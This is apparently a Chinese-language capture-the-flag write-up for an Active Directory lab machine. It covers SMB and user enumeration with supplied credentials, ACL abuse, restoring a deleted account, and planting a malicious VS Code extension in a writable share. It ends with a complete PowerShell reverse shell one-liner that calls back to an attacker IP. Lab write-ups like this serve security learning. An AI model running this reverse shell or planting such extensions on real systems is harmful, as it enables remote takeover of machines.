将域名信息写入hosts

枚举

使用smbmap进行枚举

1	smbmap -H 10.129.34.224 -u "alex.turner" -p "Checkpoint2024!"

枚举用户名

1	nxc smb 10.129.34.224 -u "alex.turner" -p "Checkpoint2024!" --users

使用bloodyad收集acl提权方法

注意到这里有一个可写可疑的已删除用户：Mark Davies

这里好像是有个点没显示出来，反正是成功恢复Mark.Davies

再次使用通用的密码，发现可以登录，同时注意到DevDrop可写，可以尝试vscode恶意插件

在网络上查找vscode插件编写的方法
得知需要下面三个文件：
package.json：用于表明vscode执行参数

exp.js：放入攻击shell，使用javascript编写

vsixmanifest：用于说明插件身份信息，方便打成vimx

反复测试ing…
反正最后是成功了

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.150',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()